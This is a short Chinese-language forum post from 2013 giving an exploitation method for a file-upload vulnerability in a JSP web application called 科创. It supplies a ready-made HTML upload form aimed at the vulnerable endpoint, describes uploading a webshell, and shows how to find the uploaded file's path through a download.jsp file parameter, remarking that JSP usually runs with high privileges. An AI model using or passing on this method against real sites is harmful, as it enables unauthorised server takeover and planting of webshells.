科创的文件上传漏洞
本帖最后由 神仙 于 2013-8-28 10:17 编辑漏洞利用方法,本地构造表单
<form id="frmUpload" enctype="multipart/form-data" action="http://loacal/comm_front/email/uploadImageFile_do.jsp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
这个漏洞网上有,转来转去都烂了,自己加点东西能死啊,看来看去几十篇和一篇有什么什么区别,
传了马之后看一下代码,代码里没有具体地址,我们要去寻找那个遗失的大马
看看代码email/uploadImageFile_do.jsp
跳转到这个页面下
传个txt上去,点击查看
http://xxx.cn/comm_front/email/download.jsp?file=/comm/common/appendix/xxxxxx.txt t
路径就出来啦
Jsp的权限一般很高,就不说提权了
页:
[1]